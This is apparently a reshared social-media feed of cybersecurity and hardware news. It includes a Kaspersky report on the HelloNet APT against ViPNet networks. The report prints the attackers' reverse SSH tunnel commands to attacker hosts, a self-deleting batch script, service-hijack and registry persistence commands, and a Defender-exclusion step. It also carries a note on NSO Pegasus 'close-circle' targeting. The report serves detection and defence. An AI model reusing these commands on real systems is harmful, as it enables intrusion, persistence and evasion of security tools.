Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

La Commissione europea penalizza l'Open Social Web e sceglie di tenere gli utenti dell'UE rinchiusi dietro le porte delle grandi aziende tecnologiche.

La Commissione europea, nella sua prima revisione del #DigitalMarketsAct, ha annunciato ad aprile di aver deciso di non estendere il mandato di interoperabilità del #DMA ai social network e non ha fornito una scadenza o una tempistica per l'attuazione di tale parte della legge; e questo è un problema!

eff.org/deeplinks/2026/07/euro…

@fediverso

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

The spam campaign attacking Writefreely instances is out of control. Can you contact the admins you know?

@fediverse

Yesterday I received this message from my friend @elettrona:

Are you the one running the "writefreely blogs" bot, aka writefreely@poliverso.org? Because there are tons of English accounts full of links that post nonstop.


And indeed, that account republishing posts from some Italian instances had a staggering amount of spam.

This is due to a very serious vulnerability that hasn't yet been patched by the developers, but which has (obviously) started to be exploited on a large scale.

I've notified all the Italian administrators of @writefreely instances, but I'm having some difficulty contacting the foreign ones.

These are the ones with the most users:

write.otter.homes/read
infosec.press/read
blog.liberta.vip/read
write.tedomum.net/read
val-vgms.gay/read
bolha.blog/read

But there are many others.

Is there anyone among you who can try this or at least spread the word?

Note: As I mentioned, the vulnerability has been known for a long time and is currently being exploited on a large scale.


github.com/writefreely/writefr…

in reply to macfranc

Fix is out now! Getting other architectures built soon.

writing.exchange/@writefreely/…

reshared this

Sanzione privacy a Wind Tre: il Garante porta la cyber al centro della compliance GDPR


@Informatica (Italy e non Italy)
La sanzione del Garante privacy a Wind Tre per due data breach mostra come la compliance all’articolo 32 del GDPR venga ormai valutata anche attraverso la qualità delle misure di cyber security. Dalla gestione delle credenziali alle API,

Cybersecurity & cyberwarfare ha ricondiviso questo.

Il bug che gli sviluppatori di @writefreely non hanno ancora corretto, sta creando diversi problemi

Tutte le istanze #Writefreely sono state colpite da una grave e aggressiva campagna di spam che sfrutta una vulnerabilità nota da tre mesi e non ancora corretta.

Ora che il nostro avviso è giunto a tutti gli admin italiani (stiamo cercando di avvisare gli altri e abbiamo informato anche @iftas ), sentiamo di poter pubblicare questo avviso

@fediverso

poliverso.org/display/0477a01e…


⚠️ ATTENZIONE ⚠️ - Il nostro account ripubblica automaticamente i post di alcuni blog Writefreely. Purtroppo c'è stato un attacco di spam ad alcune istanze Writefreely aperte al pubblico in registrazione aperta e noi abbiamo ripubblicato anche lo spam.

EDIT: nel fratempo abbiamo avvisato alcune delle istanze pubbliche italiane basate su #Writefreely che hanno deciso di sospendere temporaneamente il servizio o la semplice visibilità pubblica, in attesa che venga risolta una grave vulnerabilità segnalata ad aprile e ancora non corretta dagli sviluppatori della piattaforma

Ci scusiamo per il disagio arrecato dal nostro account, ma è stato proprio grazie a questo disagio che siamo riusciti ad allertare gli amministratori delle nostre istanze, dal momento che Writefreely non presenta strumenti di amministrazione che consentano agli admin di monitorare puntualmente le attività degli utenti


Cybersecurity & cyberwarfare ha ricondiviso questo.

⚠️ ATTENZIONE ⚠️ - Il nostro account ripubblica automaticamente i post di alcuni blog Writefreely. Purtroppo c'è stato un attacco di spam ad alcune istanze Writefreely aperte al pubblico in registrazione aperta e noi abbiamo ripubblicato anche lo spam.

EDIT: nel fratempo abbiamo avvisato alcune delle istanze pubbliche italiane basate su #Writefreely che hanno deciso di sospendere temporaneamente il servizio o la semplice visibilità pubblica, in attesa che venga risolta una grave vulnerabilità segnalata ad aprile e ancora non corretta dagli sviluppatori della piattaforma

Ci scusiamo per il disagio arrecato dal nostro account, ma è stato proprio grazie a questo disagio che siamo riusciti ad allertare gli amministratori delle nostre istanze, dal momento che Writefreely non presenta strumenti di amministrazione che consentano agli admin di monitorare puntualmente le attività degli utenti

Wireless LCD Streaming for the ANENG AN870 Multimeter


The media in this post is not displayed to visitors. To view it, please log in.

Having the information shown on the display of a digital multimeter also recorded off-screen can be incredibly useful, but unless the device exposes something like SCPI on a network interface, you will have to get creative. In the case of the budget ANENG AN870 digital multimeter (DMM), [Bits und Bolts] really wanted to show its display clearly as an overlay in OBS instead of just the camera view, but with said DMM not offering an easy way he had to resort to just copying the data sent to its multiplexed LCD.

The GitHub project page contains the background information, as well as the instructions if you too have this DMM. It might of course also be useful as the jumping off point for your own DMM modification. In total the project requires three modules: an RP2040 Zero and HC-12 433 MHz transceiver on the DMM side, and another HC-12 plus ESP32-C3 module on the receiving side. A boost module is also added to generate 3.3 V out of the 2.4 V – 3 V provided by the meter’s two AA cells.

To be able to read the LCD signal lines, a custom PCB was created that is installed inside the DMM. With the LCD’s segments mapped, this meant being able to send a perfect copy of the display’s state to the ESP32-C3 and from there making it available via WiFi.

youtube.com/embed/6CL78yID9l0?…


hackaday.com/2026/07/17/wirele…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

373 – L’AI DECIDE IN CASA NOSTRA. MA LA CASA DI CHI È? camisanicalzolari.it/373-lai-d…
Cybersecurity & cyberwarfare ha ricondiviso questo.

☕ CYBERBRIEFING — Venerdì 17 luglio 2026

👉 Leggi tutti gli aggiornamenti delle ultime 24 ore:
ilpuntocyber.rfeed.it/article.…

#newsletter #cybersecurity
@informatica

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

L’AI accelera le decisioni, ma chi allena il giudizio umano nell’era digitale?

📌 Link all'articolo : redhotcyber.com/post/lai-accel…

A cura di Marilena Viotto

#redhotcyber #news #intelligenzaartificiale #aiforgood #global summit #nazioniunite

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

L’80% delle rotture i cavi sottomarini è causato da pesca e nautica. Ecco perché

📌 Link all'articolo : redhotcyber.com/post/l80-delle…

A cura di Carolina Vivianti

#redhotcyber #news #caviSottomarini #trafficoInternet #UnioneInternazionaleTelecomunicazioni #ITU

A Sloshing-Mercury-Powered Neon Light


The media in this post is not displayed to visitors. To view it, please log in.

A person's hand is shown holding a glass flask in a dark room. An orange-red glow is emanating from the flask in a patches, forming a splash-like pattern near the base of the flask.

In 1675, while transporting a barometer by night, the astronomer Jean Picard noticed a glow inside its glass tube, just above the mercury. As the mercury sloshed and splashed across the surface of the glass, a static electric charge had built up, which was discharging by ionizing the residual gas molecules inside the evacuated tube. [Styropyro] recreated this effect, and found that the dim glow could be made much stronger by adding some noble gas to the tube.

It starts with a simple recreation: he took a volumetric flask, attached a narrow glass stem to the mouth, added some mercury to the flask, evacuated it with a vacuum pump, and sealed off the glass stem. This produced a faint glow when shaken, but it was only really visible under very low light. When [Styropyro] brought it near a Tesla coil, however, it did glow much more brightly.

Backfilling an identical flask with neon to about 40 millitorr produced a much more spectacular result (a low pressure in the tube is necessary, but moderate pressure variations don’t significantly alter the effect). When shaken even slightly, this neon-containing flask produced a bright orange-red glow just above the surface of the mercury. Points of obstruction, such as those in a zig-zag tube, produced a brighter glow. A krypton-containing tube glowed blue, but less brightly than the neon tube.

Since this is, essentially, a triboelectric effect, other materials besides mercury should work; [Styropyro] tested several materials, and found that pieces of Teflon produced a faint glow, and copper beads a somewhat brighter glow. Unfortunately, Galinstan, the obvious replacement for mercury, wets and coats glass, preventing a charge buildup.

Without an added noble gas, the standard glow of barometric light comes from the excitation of mercury vapors, a glow which can also be seen in mercury rectifiers, and which excites the phosphors of fluorescent light bulbs.

youtube.com/embed/0Y-9GbsS9Fg?…

Thanks to [Vik Olliver] for the tip!


hackaday.com/2026/07/16/a-slos…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

RHC Conference 2026 - Intervista a Pierguido Iezzi

📍Guarda il video: youtube.com/watch?v=xTueGiSQue…

#redhotcyber #rhcconference #conferenza #informationsecurity #ethicalhacking #dataprotection

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Boston Dynamics: il robot a quattro zampe Spot, presto sul pianerottolo di casa?

📌 Link all'articolo : redhotcyber.com/post/boston-dy…

A cura di Carolina Vivianti

#redhotcyber #news #robotica #intelligenzaartificiale #consegneaoggetti #areeresidenziali #logistica

White Rails are the Infrastructure Hack We Didn’t Know We Needed


The media in this post is not displayed to visitors. To view it, please log in.

A rail sprayer somewhere on Union Pacific tracks

Railroads might be a nineteenth century technology, but they’re still the backbone of cargo transportation in the 21st century. They’ve also far from run out of innovation, including this one which really just sounds like a hack: painting the rails white to beat the heat.

In the old days, when rails were short and riveted together, this might have been unecesssary; all those joints allowed for a lot of flex. But when you have kilometers of continously welded rail, the thermal expansion starts to matter. A lot. Even if the rails haven’t bent and buckled from excess heat, their capacity goes down. Trains must therefore slow way, way down in hot weather, reducing the overall amount of freight the system can handle.

So, how do you cool the million miles of metal that holds a country together? Paint. Simple white paint sprayed on the side of the rails can bring down temperatures 11 °C (20 °F), according to the Union Pacific Railroad, the first to try this in North America. It might not surprise you that this technique is also being rolled out on the other side of the pond during this summer’s European heat waves. Indeed, it was invented there; the Italians have been doing it for many years now.

If you think reducing solar heat with white paint is good, you can do better than that with special formulations that end up cooler than ambient. It passive cooling also comes in fibre form.


hackaday.com/2026/07/16/white-…

Cybersecurity & cyberwarfare ha ricondiviso questo.

'... the Secretary of the Treasury, in consultation with the National Cyber Director, the Secretary of War, through the Director of the National Security Agency (NSA), and the Secretary of Homeland Security, through the Director of CISA, shall form an AI cybersecurity clearinghouse, in voluntary collaboration with the AI industry and operators of critical infrastructure, that coordinates and deconflicts scanning for software vulnerabilities, discovers and validates such vulnerabilities, and coordinates and prioritizes remediation and distribution of vulnerability patches'.

This looks good.

federalregister.gov/documents/…

reshared this

in reply to Dr Ravi Nayyar

'... the creation of “GOLD EAGLE,” a clearinghouse that enables unprecedented cybersecurity vulnerability coordination. Open-source software partners and American critical infrastructure companies built a coordinated system ... using the existing authorities and resources of the federal government.

'[White House, Treasury, CISA, DOW] worked closely with industry partners to enable faster exploit detection and develop a rapid and prioritized response to cyber vulnerabilities across our critical infrastructure sectors.

'... already begun to intake and prioritize identified [bugs] ...'

whitehouse.gov/releases/2026/0…

A USB Port by Any Other Color…


The media in this post is not displayed to visitors. To view it, please log in.

[Dr. Gough] bought a generic USB 3.0 hub on an Asian website. Surely, USB 3 is mature enough that even the cheapest hub will have some IC in it that will work well, right? You’d think so, but a little exploratory surgery showed that the only thing about this hub that was USB 3 were the blue port connectors.

We have a few problem USB hubs ourselves, so it might be worth doing this to any you have lying around. The first clue: most of the connectors on the PCB only have four pins. On closer examination, the hub appears to be a USB 3.0 extension cable with a USB 2.0 hub made from two HS8836A chips.

Not only are these USB 2-only, but all the ports on an HS8836A also share the same USB 1.1 bandwidth. Some hubs can provide multiple ports full 1.1 bandwidth, using the higher-speed USB protocol to the PC as a backhaul.

There were quite a few other issues. Missing solder, cables soldered to the board directly, and no bypass capacitors. The per-port switches cut off USB power, but that wouldn’t stop a device with its own power from connecting. The hub has a barrel jack for power, but it would feed back to the PC, which is bad practice at best.

If you use Linux, try lsusb -t and look at the negotiated speed for your hubs. If they aren’t what you expect, it could be a cable issue, or it could just be that you also have a cheap USB hub. Don’t be surprised if your USB 3 hub shows both a USB 3 and a USB 2 hub; that’s common. But if you only see the USB 2 hub, something is amiss, or someone’s lying.

You can learn a lot about USB 3 reading Hackaday.


hackaday.com/2026/07/16/a-usb-…

Cybersecurity & cyberwarfare ha ricondiviso questo.

New: Coca Cola discloses ransomware attack on its Fairlife dairy subsidiary, says it's "temporarily suspended" U.S. operations after its production systems were hit. Disruption to dairy systems could see potential product shortages on shelves.

More: techcrunch.com/2026/07/16/coca…

Bypass for ad-blockers: web.archive.org/web/2026071621…

reshared this

Bad Apple on a Karaoke Machine


The media in this post is not displayed to visitors. To view it, please log in.

CD+Graphics was a format that never really caught on. It let music discs pack some graphics, maybe liner notes, and mostly song lyrics into the otherwise empty space on a CD. It was never intended for displaying full-motion video, but that didn’t stop [Adam Gashlin] from getting a Bad Apple, with lyrics, running on any device that will play CD+G.

The main challenge is that CD+G gives you 300 screen commands per second, which is plenty for updating text on the 48×16 blocks as the lyrics scroll by. But if you want to send custom blocks and draw images, that’s 2.5 seconds per screen: a lousy framerate.

[Adam]’s first trick is to drop the resolution way down, which gets him into the 8 FPS range. Only update the blocks that change pushes this up to a respectable 17-20 FPS. But you can see the updates, and that’s distracting. It really needed buffering.

If you don’t know Bad Apple, it’s in black and white. And like many old graphics engines of the day, CD+G uses a dynamic palette of colors. [Adam] uses this to pack four frames into one, switching between them using palette swapping. (Absolutely check out his “rainbow” version of the video to see how the palette-swapping trick works.)

In the end, his demo has audio, triple-buffered video, and lyrics at 16.3 FPS. It’s slower than the fastest video-only version, but it looks so good, and [Adam]’s explanation of all of the graphics tricks he uses to get there is the real star of the show.

If you want to see Bad Apple running on yet more minimal hardware, how about a 16×2 LCD? Or a much more ridiculous implementation? How’s regexes in Vim for absurd? Got any Bad Apple hacks of your own? Let us know in the comments or the tips line. You can never have too many.


hackaday.com/2026/07/16/bad-ap…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Two #Scattered #Spider Members Sentenced to Prison Over £29 Million TfL Cyberattack
securityaffairs.com/195501/cyb…
#securityaffairs #hacking

Even Chemical Bonds Obey Einstein’s Relativity


The media in this post is not displayed to visitors. To view it, please log in.

Although Einstein’s Theory of Relativity is typically associated with really large and really heavy things like plants in solar systems and big things in universes in general, it turns out that even at an atomic scale its effects can be measured. These are the findings of Brown University scientists, whose measurements on very heavy elements indicate the presence of relativistic bonds.

Unfortunately the paper by [Kirk A. Peterson] et al. in Science is paywalled without a convenient ArXiv version to ogle details beyond the supplemental, but the Brown press release gives quite a few details by itself, including the use of photoelectron spectroscopy to measure the strength of the bonds between the examined nuclei.

The essential summary is that our concept of how triple bonds work may be flawed, with the assumption that there are distinct sigma and pi bonds, the latter being the awkward, weaker ‘side bonds’ where the overlapping atomic orbitals do not directly line up as with a sigma bond. As it turns out, if there’s enough mass involved, relativistic effects smudge both types of bonds together into a hybrid type of bond.

Although the sigma-pi triple bond theory still seems to hold up for lighter atomic nuclei, in the case of the examined bismuth-carbon triple bond, the typical, slightly radioactive bismuth-209 nucleus with atomic number 83 is heavy enough to affect the orbital mechanics and with it the chemical bonds that these produce.

This is an important finding, as it affects our basic understanding of how strong the bonds between certain elements are. Pi bonds are after all significantly weaker than sigma bonds, so a hybrid form would effectively make triple bonds involving a heavier element stronger than one between lighter elements.


hackaday.com/2026/07/16/even-c…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Very interesting detial in NSO Group's training materials for customers:

"Pegasus training material describes situations where it may not be possible to attack a target directly, for example if they do not use a smartphone or are highly security conscious in how they use their device. In those circumstances, NSO Group suggests expanding to 'close-circle infection,' targeting others connected to the target, potentially including colleagues, friends or family members of the primary target in order to gather information about them indirectly."

There have been several documented cases of this happening, including to people close to murdered Saudi journalist Jamal Khashoggi.

securitylab.amnesty.org/latest…

Cybersecurity & cyberwarfare ha ricondiviso questo.

"Could you support $SMALL_TWEAK? We need it for $OBSCURE_PROTOCOL. It's very small! Why not?? Do you hate us?"

Here is a bunch of work to fix assembly that assumed it could overread/write the AES-GCM ciphertext because it'd be followed by 16 bytes of tag, but we regrettably support custom tag sizes. go.dev/cl/801600

(Also, what I think are some pretty cool systematic page-faulting tests.)

Cybersecurity & cyberwarfare ha ricondiviso questo.

NEW: Cops say the arrest of two members of the infamous Scattered Spider hacking group have halted the gang’s activities.

On Thursday, two members of Scattered Spider were sentenced to five years and a half in prison for hacking London’s transportation system in 2024.

techcrunch.com/2026/07/16/uk-c…

GOES-19 Goes Down, NOAA Investigating


The media in this post is not displayed to visitors. To view it, please log in.

Some breaking news from geostationary orbit, as the National Oceanic and Atmospheric Administration (NOAA) has announced that its newest Geostationary Operational Environmental Satellite (GOES) satellite unexpectedly went offline last night, and as of this morning, remains stuck in safe mode.

Launched in June of 2024, GOES-19 is one of four operational weather satellites that NOAA operates to provide forecast data and severe weather monitoring for the entire Western Hemisphere. The satellite is specifically responsible for covering the continental United States, Central and South America, as well as the Atlantic Ocean. This makes it a particularly critical asset even under normal circumstances, but the fact that it’s gone blind during the Atlantic hurricane season and while smoke from the raging Canadian wildfires is drifting over the Northeast and making the skies over Boston and New York City look like Mars is something of a worst-case scenario.

The good news is that two of the four satellites operate as orbital spares — the satellite that GOES-19 replaced in 2024, GOES-16, is still operational and can stand in as a backup for its coverage area. Obviously, it’s quite a bit older, having launched back in 2016, but it’s of the same design as GOES-19, and in good health, so there should be no degradation of service.

Still, getting GOES-19 back online will be critical for NOAA and the National Weather Service, and we expect they’ll be providing regular updates as the situation develops. Stay tuned.


hackaday.com/2026/07/16/goes-1…

Cybersecurity & cyberwarfare ha ricondiviso questo.

È stata pubblicata la versione 4.6 di Mastodon, ecco le novità e gli aggiornamenti: blog.joinmastodon.org/2026/06/…
#mastodon #fediverso
@scuola
@lealternative
@informatica
@prealpinux
@informapirata

HelloNet campaign — new malicious modules launched through the ViPNet update system


The media in this post is not displayed to visitors. To view it, please log in.

UPD 16.07.2026: Added detection rules and examples using KEDR Expert.
UPD 16.07.2026: Added detection of the malicious campaign in network traffic using Kaspersky Anti Targeted Attack (KATA) with the NDR module.
UPD 16.07.2026: Updated the list of Indicators of Compromise (IoCs) and TTPs.

We discovered a new APT attack using previously unknown tooling, which started at least in May 2026 and remains active at the time of publication. It is notable in that the implants used during it were launched through the ViPNet update system (a software suite for creating secure networks). During our research, we identified attempts of targeted infection of large Russian organizations from the government, energy, transport, education, and logistics sectors, as well as industry. This is not the first time an advanced group has targeted computers connected to ViPNet networks. For example, last year we discovered a complex backdoor mimicking ViPNet updates.

Persistence via the update system


On one of the analyzed systems, we identified a malicious file named wtsapi32.dll in the directory C:\Program Files (x86)\InfoTeCS\VIPNet Update System, which belongs to the ViPNet suite update system. By placing the file in this directory, the attackers implement the DLL Sideloading technique — the ViPNet update system executable file itcsrvup64.exe, which is launched at OS startup, is susceptible to it. Thus, during this attack, the attackers tried to implement persistence on the system through the ViPNet software update component.

HelloInjector — a loader for additional malicious components


The wtsapi32.dll component is a loader, which we named HelloInjector. Its main goal is to inject its code into the svchost.exe process and launch the malicious payload. After launch, the malware checks the process in the context of which it was launched. If the name of the main process is not svchost.exe, the loader starts iterating through all processes running in the operating system. It looks for a process whose name contains the string svchost, and the command line contains the string netsvcs. If such a process is found, the loader injects itself into the target process using the NtWriteVirtualMemory and NtCreateThreadEx functions.

After restarting in the new process, the loader checks the process name again for the presence of the string svchost. Having confirmed the successful check, HelloInjector loads and executes the malicious payload in memory, which is stored in its body in plain text.

HelloProxy — a tool for traffic proxying and launching new malicious payloads


The malicious payload, which we named HelloProxy, is simultaneously a hidden proxy and a loader for the following modules sent by the command server. It works by intercepting the NtDeviceIoControlFile, closesocket, and shutdown functions. Their interception is carried out using the Microsoft Detours library.

The handlers of the closesocket and shutdown functions prevent the premature closing of sockets used for interaction with the C2. In turn, the handler of the NtDeviceIoControlFile function contains the main malicious logic. Its code implements the interception of two IOCTL codes:

  • AFD_RECV (0x12017)
  • AFD_GET_TDI_HANDLES (0x12037)

These codes are used during socket operations — their interception allows the malware to hinder security solutions operating in user mode for filtering network connections. Kaspersky security solutions detect such activity and prevent infection attempts at all stages.

The AFD_GET_TDI_HANDLES handler is responsible for socket registration, and the AFD_RECV handler initiates the processing of incoming traffic. It is worth noting that every incoming message that triggered the processing of the AFD_RECV code is logged to the file C:\users\public\tesh4RPC.txt in the format:
threadid: <Thread ID> pid=<PID>\r\n
After installing the interceptors, the malware starts listening on ports 5003 and 5060 in anticipation of the first commands from the C2 server. In order to distinguish the command server traffic from the rest of the traffic, the implant implements a handshake process: it sends two bytes 0x0502 through the socket and expects to receive a message containing the string ASDFASFSAFASDF. After the successful completion of the handshake, the processing of incoming commands continues.

Depending on the received command, there are two execution branches:


    • Working as a proxy. The malware accepts strings in the following format:
      <ip_addr>:<port>
      Afterwards, it creates new sockets and starts forwarding traffic between them.
    • Working as a loader. The malware accepts an executable file from the command server, after which it loads it into the memory of its own process and launches it in a separate thread.


During the research, we managed to discover two malicious payloads that were injected into the svchost process, likely as a result of the previously described loader’s operation:

  • An implant, which we named HelloExecutor, with the help of which attackers can execute commands on the infected system;
  • A module for cleaning ViPNet software log files, which we named HelloCleaner. It allows hiding the attackers’ actions in the system.

We established that the HelloExecutor backdoor was used for reconnaissance in the networks of infected organizations. The following shell commands were executed:
query user
ipconfig /all
ping 8.8.8.8 -n 1
net user /do
net group /do
dir "C:\Program Files (x86)"
dir "C:\Program Files (x86)\infotecs\"
dir "C:\Program Files (x86)\infotecs\ViPNet Administrator"
dir "C:\Program Files (x86)\infotecs\ViPNet Client\Export"
dir "C:\Program Files (x86)\infotecs\ViPNet Client"
dir "С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export\"
dir "$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network <номер сети удален>"
dir c:\users\
[username]query user
dir C:\Users\Public\music
In these commands, the mention of the directory C:\Users\Public\Music is notable. We established that on infected machines, the attackers used this directory when launching an SSH tunnel from the infected infrastructure to the attackers’ command server (5.39.253[.]206). The attackers launched a renamed executable file of the legitimate PuTTY utility (a client for various remote access protocols):
C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw

[redacted]

HelloBackdoor — a Rust-based backdoor for file system manipulations


In addition to this, a backdoor written in the Rust language, which we named HelloBackdoor, was discovered on one of the infected systems. It accepts connections on port 443, waiting for the string 47c6235b4d2611184 (the second half of the MD5 hash of the string “hello\n“) to activate the backdoor. This backdoor further accepts the following commands:
!upload — upload a file to the infected machine
!down — download a file from the infected machine
!stop — stop the backdoor’s operation. For this, a BAT file is created and executed with the following content:
@echo off
:loop
if exist <selfpath> (
del /F /Q <selfpath>
if exist <selfpath> goto loop
)
sc stop iplircontrol >nul
timeout 5 > nul
sc start iplircontrol > nul
(goto) 2>nul & del /F /Q %0
If the command text did not match the above listed, the command is executed using cmd.exe.

Attribution


During the analysis of one of the wtsapi32.dll file samples, we found an unused string:
GET / HTTP/1.1\r\nHost: news.sina.com\r\nConnection : keep - alive\r\nUpgrade - Insecure - Requests : 1\r\nUser - Agent : Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 145.0.0.0 Safari / 537.36 Edg / 145.0.0.0\r\nAccept : text / html, application / xhtml + xml, application / xml; q = 0.9, image / avif, image / webp, image / apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n
It refers to the news portal sina.com, which is popular in China.

In addition, analyzing the strings in the HelloBackdoor backdoor, we established that during compilation, Rust packages (crates) were downloaded from the mirror mirrors.ustc.edu.cn. Most likely, these strings remained in the malicious files unintentionally. However, the probability of using “false flags” implanted by attackers to complicate the attribution process cannot be excluded. At present, we link this campaign to the activities of an unknown Chinese-speaking APT group with a low degree of confidence.

Recommendations


Given that ViPNet software is not the first time being used by advanced attackers to conduct cyberattacks, we recommend paying special attention to the protection of workstations with this software. In particular, network traffic monitoring should be configured on the ports specified in the article for timely detection of signs of compromise.

Countering complex targeted attacks requires a comprehensive approach that combines security technologies operating at various stages of the cyberattack lifecycle. Such a multi-level security model helps not only to detect but also to prevent incidents of this class. This approach is embedded in the architecture of the Kaspersky Symphony line of solutions, designed to protect businesses from APT-level threats, including attacks similar to the one described in this article.

Kaspersky solutions detect this threat using the following verdicts:

  • Trojan.Win32.Agentb.ttoe,
  • Trojan.Win64.Convagent.gen,
  • Trojan.Win64.Agent.smgpqx
  • HEUR:Trojan.Win64.DllHijacking.gen


Detection by Kaspersky solutions

Kaspersky security solutions, such as Kaspersky Endpoint Detection and Response Expert, successfully detect malicious activity within the described attacks.

One practical method of detection is monitoring renamed PuTTY/Plink binaries rather than relying on the file name: even if the executable is named frontpage.exe, its PE header, version, strings, and hash match the original Plink, which is confirmed by EDR events. Additionally, it is worth paying attention to the specific command line with which the process was launched. The KEDR Expert solution detects this activity using the using_plink_or_putty_for_port_forwarding rule.

It is also important to monitor Process Injection into svchost.exe originating from the ViPNet update process itcsrvup64.exe, since this component should not legitimately inject code into system processes. Such behavior is a characteristic indicator of HelloInjector activity, which uses a trusted and signed process to mask malicious injection. The KEDR Expert solution detects this activity using the vipnet_load_library_code_injection rule.

Another effective way to detect malicious activity associated with ViPNet is monitoring network traffic. The Kaspersky Anti Targeted Attack (KATA) solution with the NDR module detects this activity using the IDS module and a Suricata rule for the HelloBackdoor backdoor activity.

The rule is implemented based on the first packet expected by the malware. It accepts TCP connections on port 443, expecting to receive the command 47c6235b4d2611184 (part of the MD5 hash of the string “hello\n“), which activates the backdoor.

The Kaspersky Managed Detection and Response service detects this attack using the following indicators:

  1. Monitoring the creation of the wtsapi32.dll library in the C:\Program Files (x86)\InfoTeCS\VIPNet Update System directory.
  2. Monitoring the launch of unusual processes (not typical for ViPNet, lacking an InfoTeCS signature) by the ViPNet update process ("Itcsrvup64.exe" or "Itcsrvup.exe").
  3. Creation of library files (.dll) in a directory associated with ViPNet (by default, ViPNet Update System or VIPNET CLIENT) by ViPNet processes.
  4. Atypical activity (file creation/process execution) from an instance of the svchost.exe process.
  5. Creation of executable files in directories that are writable by default (%ProgramData%, %TEMP%, %SystemRoot%\Temp, C:\Users\Public, music|pictures|videos|contacts|links|libraries).
  6. Monitoring the creation of tunnels using ssh or plink processes (identification is performed based on the original PE file name, not the executable file name); the detection is based on the presence of substrings like port:address:port and their variations in the command line.


Indicators of Compromise


HelloBackdoor
16C211C96735F2FAE9361B89BD7A31BF
1BFE2B9493128574907A8279256A8BCC
f9eed2f0158dc98e7012fb809152209c – #new

HelloBackdoor Droppers:
6001829A128FE264B4403138700C11A8 – infotecs\vipnet client\puh.exe – #new
EE4FF46DDD8489E81447962F927BC3F6 – infotecs\vipnet client\store.exe – #new

Utility for adding exclusions to Windows Defender:
41c938b3cd7e55d4077e34976929b140 — #new

wtsapi32.dll
B103CD21280B4061F88B2BCC51394894
9F5606A0755BC633B9BD7DB6D179C09E
0CFDFFC56F0FA325D0C4D24780B46597

5.39.253[.]206
176.32.34[.]135 – #new
Detected TTPs: #new
T1569.002 — System Services: Service Execution
– “cmd” /c sc start UrBackupClientBackend

T1016 — System Network Configuration Discovery
– “cmd” /c arp -a
– “cmd” /c routeprint

T1049 — System Network Connections Discovery
– “cmd” /c netstat -ano

T1018 — Remote System Discovery
– “cmd” /c ping mail.ru -n 2

T1082 — System Information Discovery
– `”cmd” /c systeminfo

T1057 — Process Discovery
– “cmd” /c tasklist

T1007 — System Service Discovery
– “cmd” /c sc query UrBackupClientBackend

T1083 — File and Directory Discovery
– “cmd” /c dir temp*.tmp
– “cmd” /c dir $temp\*.tmp
– “cmd” /c dir amgmt*
– “cmd” /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669
– “cmd” /c dir $public\libraries\
– “cmd” /c dir d:\WindowsImageBackup

T1005 — Data from Local System
– “cmd” /c type $temp\TS_E9E3.tmp
– “cmd” /c type $temp\Acr6F3D.tmp

T1074.001 — Local Data Staging
– “cmd” /c copy appdata\infotecs\*\APN000B.txt $public\libraries\

T1070.004 — Indicator Removal: File Deletion
– “cmd” /c del $windir\amgmt.dll
– “cmd” /c del $public\libraries\APN000B.txt

T1543.003 — Create or Modify System Process: Windows Service
– sc stop AppMgmt
– sc delete AppMgmt
– sc create AppMgmt binpath= “system32\svchost.exe -k netsvcs” type= share start= auto displayname= “Application Management”
– sc description AppMgmt “Processes installation, removal, and enumeration requests for software deployed through Group Policy. If the service is disabled, users will be unable to install, remove, or enumerate software deployed through Group Policy. If this service is disabled, any services that explicitly depend on it will fail to start.”
– sc failure AppMgmt reset= 0 actions= restart/0

T1112 — Modify Registry
– reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d $system32$selfname.dll
– reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceMain /t REG_SZ /d ServiceMain

T1036 — Masquerading (service, description, and DLL masquerade as the legitimate Application Management)
– “cmd” /c copy $windir\amgmt* $system32\

T1059.003 — Execution of auxiliary scripts
– “cmd” /c $windir\amgmt.bat
– “cmd” /c $windir\insru.cmd

T1105 — Ingress Tool Transfer
– “cmd” /c $programfiles\7-zip\7z.exe x $windir\Irsoisas.zip -o”$windir

T1562.001 — Impair Defenses: Disable or Modify Tools
– “cmd” /c \$windir\puh.exe add $windir\autoit3.exe white

T1059 / T1218 — Proxy execution via AutoIt
– “cmd” /c \$windir\autoit3.exe \$windir\data.dat

T1572 — Protocol Tunneling / T1090 — Proxy / T1021.004 — Remote Services: SSH
– c:\users[username]\libraries\pagent.exe -C -N -R 6443:[redacted] root@176.32.34.135 -P 48022 -pw [redacted]

#new
Cybersecurity & cyberwarfare ha ricondiviso questo.

Data breach, il Garante privacy sanziona #WindTre per 1,7 milioni di euro

Riscontrate gravi carenze nella sicurezza dei sistemi aziendali, che hanno determinato due accessi abusivi e l’esfiltrazione dei dati personali di oltre 365mila clienti. Per 41.359 di essi, l’esfiltrazione ha riguardato anche le informazioni relative ai metodi di pagamento utilizzati, come il bollettino postale, l’Iban, la carta di credito con il numero parzialmente oscurato e la data di scadenza.

gpdp.it/home/docweb/-/docweb-d…

@privacypride

Cybersecurity & cyberwarfare ha ricondiviso questo.

A differenza di quello che credono i cittadini, la polizia statunitense utilizza Flock per rintracciare le persone, non le auto

Secondo i dati esaminati da 404 Media, la polizia ha utilizzato la funzione di ricerca FreeForm di Flock per individuare persone con tatuaggi e che indossano magliette di sport specifici, e le ricerche a volte includono anche l'etnia del soggetto.

404media.co/how-cops-use-flock…

@eticadigitale


